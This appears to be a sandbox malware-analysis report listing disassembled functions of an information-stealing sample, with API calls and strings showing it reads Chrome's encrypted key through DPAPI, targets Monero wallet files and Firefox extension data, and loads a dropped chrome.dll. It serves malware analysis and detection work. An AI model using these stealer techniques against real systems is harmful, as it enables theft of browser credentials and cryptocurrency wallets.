Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
API String ID: 1029625771-1545816527
Opcode ID: fa9adc59799e6195bf0a67e6a35b2f158978992a7e38f1ff60b7c841cd52059b
Instruction ID: 1d8c4a46e97480b4c6b3adf848a8b6eabcff11d45e12314783934384258f0f60
Opcode Fuzzy Hash: fa9adc59799e6195bf0a67e6a35b2f158978992a7e38f1ff60b7c841cd52059b
Instruction Fuzzy Hash: 95F06D78646300EFD721AB62E90CBAA3AD4A305B10F002569F455AB284C27E89C4CBD2

Function 00E28EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E296AE,00000000), ref: 00E28EEB
RtlAllocateHeap.NTDLL(00000000), ref: 00E28EF2
wsprintfW.USER32 ref: 00E28F08

Strings

%hs, xrefs: 00E28EFF

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 4a8137ea7add64987bbd1bc293c2438e786df04bdccef2edc272c053bc3be240
Instruction ID: 6184d69c83452c8ca8ca3f3f662505dea9b565c18bb1f587c25c8f26c2640605
Opcode Fuzzy Hash: 4a8137ea7add64987bbd1bc293c2438e786df04bdccef2edc272c053bc3be240
Instruction Fuzzy Hash: 21E0EC75A44309BBDB24DBD5DD0AE6D7BB8EB05B02F000198FE499B340DA769E109BD1

Function 00E1A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,0099EA10,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1AA11
lstrlen.KERNEL32(00000000,00000000), ref: 00E1AB2F
lstrlen.KERNEL32(00000000), ref: 00E1ADEC

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

DeleteFileA.KERNEL32(00000000), ref: 00E1AE73

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 8ff5b125a5899fe623410759cfdbff09bfa6b91ec628f3c387696b1c0cba93cf
Instruction ID: 834d19fa32fae14a36569f0f13313424315dec427581c1a68fd82cec259280e5
Opcode Fuzzy Hash: 8ff5b125a5899fe623410759cfdbff09bfa6b91ec628f3c387696b1c0cba93cf
Instruction Fuzzy Hash: F7E106729101289BCB14FBA4ED62EEE7379AF14300F4895A9F51776091DF316A4CCB62

Function 00E1D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,0099EA10,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D581
lstrlen.KERNEL32(00000000), ref: 00E1D798
lstrlen.KERNEL32(00000000), ref: 00E1D7AC
DeleteFileA.KERNEL32(00000000), ref: 00E1D82B

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: cbcabe42554e6a353b2a9bd825f38abf0e7b8ae29829b65601e79c84029a0017
Instruction ID: 2b765520036fd2cec06038a0be4cd5df2a88fe40adc88d00e8b5eed594ca17a5
Opcode Fuzzy Hash: cbcabe42554e6a353b2a9bd825f38abf0e7b8ae29829b65601e79c84029a0017
Instruction Fuzzy Hash: 07913672D101289BCB14FBA4EDA6EEE73B9AF14300F485578F51776091EF346A48CB62

Function 00E1D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,0099EA10,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D901
lstrlen.KERNEL32(00000000), ref: 00E1DA9F
lstrlen.KERNEL32(00000000), ref: 00E1DAB3
DeleteFileA.KERNEL32(00000000), ref: 00E1DB32

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: dd806eb9e08378469326e0488380f1fa77cccbe6a9f34e6d065bf7315c7235a7
Instruction ID: 279a6ee8225319dc874bfb3a2534e5b3b3551fdfdd98f904384b66552a12992a
Opcode Fuzzy Hash: dd806eb9e08378469326e0488380f1fa77cccbe6a9f34e6d065bf7315c7235a7
Instruction Fuzzy Hash: A48122729101289BCB14FBA4EDA6EEE73B9AF14300F485578F50776091EF356A08CB72

Function 00E8FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00E8FF9E
___AdjustPointer.LIBCMT ref: 00E8FFC1
___AdjustPointer.LIBCMT ref: 00E9005D

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
Instruction ID: a5a8191c12151f05d4238b09e48612d0be5ecad35ec131f8f9c0b83437aa856e
Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
Instruction Fuzzy Hash: 9451E272600206AFEF29AF54C841BBA77B5FF01314F24652DEA0DA7691E731ED40DB90

Function 00E1A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00E1A664

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Strings

v10, xrefs: 00E1A5C6
v20, xrefs: 00E1A571
@, xrefs: 00E1A614

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpy
String ID: @$v10$v20
API String ID: 2746078483-278772428
Opcode ID: 1c3cf8997329f47e8b10d87f73a4b43e79690c000883660396e7919994b56db1
Instruction ID: 4ed220256a2bbe3679a4825abdebc94b7b208616037f11affb29b919f73015e9
Opcode Fuzzy Hash: 1c3cf8997329f47e8b10d87f73a4b43e79690c000883660396e7919994b56db1
Instruction Fuzzy Hash: C6513DB0A10208EFDB14EFA4DD96BED77B6BF40344F089528F90A7B191DB706A45CB51

Function 00E1F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA

Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E31678,00E30D93), ref: 00E1F64C
lstrlen.KERNEL32(00000000), ref: 00E1F66B

Strings

^userContextId=4294967295, xrefs: 00E1F69C
moz-extension+++, xrefs: 00E1F6AD

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 8367bf9739a61ad69fcce4d4d6f4dd0bbe557cb05588892633ee7b62c907b349
Instruction ID: 9f2bfd2d91f9c73a7666ddc3ff0a483bf4de027cf998683a801bf60e424c849b
Opcode Fuzzy Hash: 8367bf9739a61ad69fcce4d4d6f4dd0bbe557cb05588892633ee7b62c907b349
Instruction Fuzzy Hash: 5C510F72D102189BCB04FBA4EDA6DED77B9AF54300F489578F81777191EE346A08CB62

Function 00E237B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 3335f6404402419e51eb03a8202e6beb49d4f7f42884dd2c7aaa46cddfd55128
Instruction ID: d5e0f57a8f3beedd62c2c68f4a80879554b185ecdcad615f5abfcaf567bed8f9
Opcode Fuzzy Hash: 3335f6404402419e51eb03a8202e6beb49d4f7f42884dd2c7aaa46cddfd55128
Instruction Fuzzy Hash: 8A416371E002199FCB18EFB4E855AEEB7B8AF44304F049028F41677185EB749A45CFA1

Function 00E1A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA

Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E1A489

Part of subcall function 00E1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A23F
Part of subcall function 00E1A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E14F3E,00000000,?), ref: 00E1A251
Part of subcall function 00E1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A27A
Part of subcall function 00E1A210: LocalFree.KERNEL32(?,?,?,?,00E14F3E,00000000,?), ref: 00E1A28F

Part of subcall function 00E1A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E1A2D4
Part of subcall function 00E1A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E1A2F3
Part of subcall function 00E1A2B0: LocalFree.KERNEL32(?), ref: 00E1A323

Strings

"encrypted_key":", xrefs: 00E1A480
, xrefs: 00E1A511
DPAPI, xrefs: 00E1A4D9

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
